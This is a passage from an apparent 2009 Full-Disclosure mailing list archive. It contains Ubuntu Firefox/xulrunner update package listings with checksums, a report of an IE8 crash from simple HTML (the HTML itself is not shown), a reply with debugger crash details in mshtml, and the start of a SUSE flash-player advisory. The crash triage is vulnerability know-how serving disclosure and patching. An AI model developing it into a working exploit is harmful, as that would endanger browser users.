4574573f2b2e6829a486b7858bd5f375 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69044 eb2bada6d2708c8115bfaa50dbc5bd45 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 8938 64c0c6e481e57023698fb376c2780c17 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 69006 4f85f5cdf17720b327ba0439512a2c28 http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 127872 091c25f0e6eefd84a370ded08a3203b2 http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.13+nobinonly-0ubuntu0.8.10.1_all.deb Size/MD5: 237636 e7e3f15a5da0265a063a71687eda48f9 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 203816 60047719ffc80ec6fd88f8fd5aae00df http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 202208 ee3c6ecbcc1b6cfe4483e2c12f650901 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 69118 986b13d2835b9c76de4f8c8f0566417f http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 88546 ccfc40e2e267d6da580437a3ad65001f http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 904786 5995614d369ef5bc5ca862fd019c9959 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 4572060 1d37c24e4073509b72797ac767307b6d http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 47110 e678228dfe8184a4d00906d3de8b4c5d http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 8726498 a251f24fc8c5299ee2db1c904fb442ce http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_amd64.deb Size/MD5: 22836 88adb40b4307ecafbc719b92917fcf6a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 203806 60efb418747847b6928d3ad585a36e72 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 202220 bb5578dde63b0fb42f511b96c83a8034 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 69116 61047140b99c3ee6f315a3140a50c179 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 84598 56c146021e29a31bdea5e60ce87732fb http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 886988 0aac6806add5631922ce4e78fba0c458 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 4546912 32c17d007137f9a876e89da8d8fc9646 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 39376 6ebfd47530d43493c18692c3ae82887e http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 7555422 6fac5f155f5856154c45d068592c4752 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_i386.deb Size/MD5: 22836 18eef86e35197c3e786ef53afc106329 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 203810 b30e78ebb6a9ce63933f84fe6deff95f http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 202212 2cf0b41a08a57f53a24c1f24aa8fecd9 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 69114 6b5cb778a595fb66e88bc0be305e0c6c http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 83994 155af26a37f1db84451b59e1d266518d http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 884102 ae0a49705904085abcef72aec0a373a9 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 4545280 b499e9fd34d5536b275d5b434a121759 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 38402 1a193a1ecbcc53193f4c09efe9c99c20 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 7452566 74a13b61983b75cd197464f32d1f3717 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_lpia.deb Size/MD5: 22834 cce3b75be705a8b34b9c32a85439a024 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 203826 72f69019bc1d035a9ba930ae847c92b3 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 202214 4789019621dd16f5e19358742cd8eb22 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 69120 21625b9dd579bf191519a31402af106f http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 85974 4d840cbd40950b8e240e4737e10a63da http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 898406 22878dd2c8365730f904be0ff668b9b9 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 4538992 b2b0b68e1f2e9613e105c5c3490c66cf http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 42408 e0452110baa887c04860be6360b698e4 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 8295250 36d7e5f171dc1ee63f8c8c0d06e3085f http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 22842 61e1a37a5d06dbc3bd65c9c249daa85a sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 203824 c02c6895037c98871734cecd81afe0c6 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 202220 61e6bbfc83105db1ead169d5bf381160 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 69120 490ebb7d5911c4e2a7d90c245ba69f15 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 83670 791ad3463e795bdc7730bfbc40ca1e80 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 886794 d25d613025a3be658572249995ef49e0 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 4526092 9e7a75dcdfad8f15cbeb99a678466eae http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 37872 afdf4960daf80dde60b2cf98ef8ac132 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 8113160 91163736137c243c60624c6de1e7d413 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.8.10.1_sparc.deb Size/MD5: 22842 3a2a982e6f16525626ffad5510bf506b Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.9.04.1.diff.gz Size/MD5: 123163 273bf6c10d676f64a4948726b72295a5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.9.04.1.dsc Size/MD5: 2787 f8116dedb99b2507879b00848c2ab823 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly.orig.tar.gz Size/MD5: 11199029 5960200a1afdc601d9a8d9befaf4f196 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.9.04.1.diff.gz Size/MD5: 251953 a48a690f299e2b41fb925b291f59946e http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.9.04.1.dsc Size/MD5: 2801 1d13f7f32ca1de697d0ae6ddfda75210 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly.orig.tar.gz Size/MD5: 41914844 ec1fa36eac13668b99ae9fd4b4c597a4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69352 671a15fed263565c0ee2912df6264979 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69254 01de87a09f77da37a83fd9118b0cf5ee http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69270 389b83c91b646737d1e2dadfa8bfc80e http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69232 dffc78dc06316b461a34f941a50aa731 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69212 37a73e1a2bd188d7422ecc85d7ac6d08 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69342 05665f30438a36c7afb986a170941db0 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69278 ce84667f5c295bf9dd337fc1e0f9b294 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69228 3c723411fc52e4f2f67906f4c5ac3f94 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 8972 52149aee4f880f894442e24e24105dfa http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 8964 262c810a158c46cbb76c3162c3ed4936 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69248 45369170b31a9a3f35de6857b3595ea5 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69212 4b63b89f7b590d55da6a40d901afca13 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69204 89aae0975ca735815804bf04dcfecdb3 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 8950 a1425e145102c7c938e53af8f659c674 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69236 a040027890714f67da33d72dc137352e http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 8936 3aa2464a0f804dc6f92b142d0456c2af http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 69206 e63c380559369983091e8e8b05727ecd http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 128218 45ccde4249bf2699231a7c3377a5afec http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.13+nobinonly-0ubuntu0.9.04.1_all.deb Size/MD5: 238042 8302d9dc5ca0141caab330c1bc9219ac amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 203958 ed00d77936238ad26f245d15544943f2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 202400 e5629d3826548e628ad013286b72cf8a http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 69314 7c4578e4c7ca3da95b43694005fb51bb http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 88728 27fe93c62389e6824897e12fc6def5a8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 904746 eb8e3316fa92400a3afffeac6cfec36e http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 4572288 a9633f9eed7f468cf9014b4e5584c22f http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 47112 ad3b3c6b171c301b77c549b106ef5f7c http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 8727884 769b71c617130ad2e8ed4c29e8f197a3 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_amd64.deb Size/MD5: 23098 816ae351b9bef527fde5857a0c0fcd4d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 203962 147fa2c05f38d288f634fdd27f32f436 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 202394 d6c1a37ec2dc0c39f85e4ab85ee2576c http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 69316 abfd48d36d13e4f1b384e8ddb07db2e8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 84800 b29b43849ac388146032cbb2a1540df3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 886984 eb513cbc03a8d94dff1dbafec6da53c6 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 4546846 32a46f756513e2cd3b330d851c58e794 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 39378 43ec20198233e725d5b703eb5d1f91b4 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 7556676 39b5fa5f5bc5d6151cf2292a1614c6d1 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_i386.deb Size/MD5: 23102 38e651bd15f8cd98202cb584bc80c5fa lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 203960 65f41f6e267456a0b53b8722e3cd45c6 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 202388 5b30d315409a4f1b52d500a0436c6c8f http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 69306 b5e29d527125010fb857439497ce4b92 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 84208 6b4d8e02d2c4dded78af5909ed207a10 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 884082 665578730edacc1875a34388e7b872bf http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 4545278 124da9276f166f9b6a267d6029c0ab94 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 38378 cf7a96a63940ebd96e2b0f0871a08586 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 7453510 7dc3e28e524bdc4ede0bd16fcd8c0ed6 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_lpia.deb Size/MD5: 23094 c2ef897da8240b75f4fb68398d751f42 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 203970 0b6dac146f3be06e83e815486db9fe4c http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 202398 f01b36362337ff6ac90597c9e02ccf3f http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 69314 5f9ab9c26d8f3b31ac039ab0cf5c9091 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 86186 a5a973219d02df82bc5b815fc1ef5db9 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 898364 15d8bf968c3f057f653233ab74e6edd8 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 4538914 6332e3245af8ec7be17a87499d6e41f0 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 42420 ff8aa433966be4b0268a7dff4073a6f2 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 8295874 3d69dce5900b4789b9bf86b052b94d90 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 23100 eb6283715933e28bbb6c64e951875061 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 203968 893706fd13147e87d9fd4d7c3eb091b0 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-branding_3.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 202394 82c112ff306eff7b6a54a7eb97de5a1a http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 69316 1ab763639a57bac9480d9d1fca6fb527 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 83824 5d3a2bf035eacd96d8a63a6d331629f1 http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-3.0_3.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 886672 edd613e208c786caac5452191a08d991 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 4525662 5756f214560ccc25895d489c71adab8d http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 37816 dd58543124376284c1f3597b4538ff71 http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 8114192 f0d4669359604bc3fc3f6b11d6f33f6d http://ports.ubuntu.com/pool/main/x/xulrunner-1.9/xulrunner-dev_1.9.0.13+nobinonly-0ubuntu0.9.04.1_sparc.deb Size/MD5: 23098 e2afae9c17bd7047d6ee2733094b2cf0 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090804/a2109b6d/attachment.bin From schnuddelbuddel at love.ms Wed Aug 5 08:08:33 2009 From: schnuddelbuddel at love.ms (schnuddelbuddel at love.ms) Date: Wed, 05 Aug 2009 09:08:33 +0200 Subject: [Full-disclosure] IE8 crashes with simple HTML Message-ID: <1029850590@web.de> Hi, this simple HTML page causes Micrsoft Internet Explorer 8 to crash: Veryfied with IE8.0.7100.0 on W7 x64 RC.
Any comments (reaseon? dangerous? ...) are welcome. schnuddelbuddel From Thierry at Zoller.lu Wed Aug 5 11:00:41 2009 From: Thierry at Zoller.lu (Thierry Zoller) Date: Wed, 5 Aug 2009 12:00:41 +0200 Subject: [Full-disclosure] IE8 crashes with simple HTML In-Reply-To: <1029850590@web.de> References: <1029850590@web.de> Message-ID: <1366182942.20090805120041@Zoller.lu> Could reproduce, unhandled second chance read access violation in mshtml!Ptls5::FsUpdateBottomlessPel+0x41d (FPO: [7,45,4]) Faulting Instruction:40af4234 cmp ecx,dword ptr [eax+18h] Basic Block: 40af4234 cmp ecx,dword ptr [eax+18h] Tainted Input Operands: eax, ecx 40af4237 jne mshtml!ptls5::fsupdatebottomlesspel+0x47c (40af6cf7) Tainted Input Operands: ZeroFlag -- http://blog.zoller.lu Thierry Zoller From thomas at suse.de Wed Aug 5 13:33:25 2009 From: thomas at suse.de (Thomas Biege) Date: Wed, 05 Aug 2009 14:33:25 +0200 Subject: [Full-disclosure] SUSE Security Announcement: flash-player (SUSE-SA:2009:041) Message-ID: <4a797c15.Y6/hQsI0x8WFkGye%thomas@suse.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ______________________________________________________________________________ SUSE Security Announcement Package: flash-player Announcement ID: SUSE-SA:2009:041 Date: Wed, 05 Aug 2009 09:00:00 +0000 Affected Products: openSUSE 10.3 openSUSE 11.0 openSUSE 11.1 Novell Linux Desktop 9 SUSE Linux Enterprise Desktop 10 SP2 SLED 11 Vulnerability Type: remote code execution Severity (1-10): 8 SUSE Default Package: yes Cross-References: CVE-2009-0114, CVE-2009-0519, CVE-2009-0520 CVE-2009-0521 Content of This Advisory: 1) Security Vulnerability Resolved: remote code execution Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none 6) Authenticity Verification and Additional Information ______________________________________________________________________________ 1) Problem Description and Brief Discussion The flash-player is a web-browser plugin that allows displaying animated web-content and remote access to client hardware (mic, web-cam, etc.). A specially crafted Shockwave-Flash (SWF) file could cause a buffer overflow in the flash-player plugin. This buffer overflow can probably be exploited to execute arbitrary code remotely. 2) Solution or Work-Around No work-around, please update. 3) Special Instructions and Notes Please restart your web-browser after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv to apply the update, replacing with the filename of the downloaded RPM package. x86 Platform: openSUSE 11.1: http://download.opensuse.org/update/11.1/rpm/i586/flash-player-10.0.22.87-0.1.1.i586.rpm openSUSE 11.0: http://download.opensuse.org/update/11.0/rpm/i586/flash-player-9.0.159.0-0.1.i586.rpm openSUSE 10.3: 